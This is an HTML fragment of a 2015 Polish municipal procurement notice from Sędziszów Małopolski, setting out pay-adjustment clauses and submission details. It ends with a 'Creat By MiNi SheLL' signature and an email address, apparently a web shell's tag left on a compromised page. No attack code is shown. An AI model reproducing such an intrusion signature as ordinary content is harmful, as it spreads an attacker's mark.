2.	W sytuacji, gdy w trakcie realizacji umowy zmianie ulegną przepisy prawa w zakresie:
-	stawki podatku od towarów i usług,
-	wysokości minimalnego wynagrodzenia za pracę ustalonego na podstawie art. 2 ust. 3-5 ustawy z dnia 10 października 2002 r o minimalnym wynagrodzeniu za pracę,
-	zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne i w wyniku tych zmian koszty wykonania przez Wykonawcę zamówienia będącego przedmiotem niniejszej umowy wzrosną o więcej niż 10% - Wykonawca będzie miał prawo zwrócenia się do Zamawiającego z wnioskiem o odpowiednie zwiększenie wynagrodzenia.
3.	Wraz z wnioskiem, o którym mowa w ust. 2 powyżej Wykonawca zobowiązany jest przedłożyć szczegółowe wyliczenie wzrostu wynagrodzenia w oparciu o przesłanki,                 o których mowa w ust. 2 powyżej.
4.	Zamawiający, w terminie 14 dni od dnia złożenia przez Wykonawcę wniosku, o którym mowa w ust. 2, będzie miał prawo do zgłoszenia zastrzeżeń do złożonego przez Wykonawcę wyliczenia wzrostu wynagrodzenia. Brak zgłoszenia przez Zamawiającego  zastrzeżeń w terminie, o którym mowa w zdaniu poprzedzającym równoznaczne będzie z przyjęciem wniosku Wykonawcy.
5.	Zmiany do Umowy, o których mowa w pkt. 1, 2 wprowadzane będą na podstawie podpisanego przez Strony Protokołu Konieczności, w którym przedstawiona będzie podstawa zmiany i jej wpływ na Umowę. Zmiana wymagała będzie zawarcia stosownego aneksu do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.sedziszow-mlp.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Sędziszowie Małopolskim, ulica Rynek 10, pokój nr 15.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.06.2015 godzina 11:15, miejsce: Urząd Miejski w Sędziszowie Małopolskim, ulica Rynek 1, pokój nr 9.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com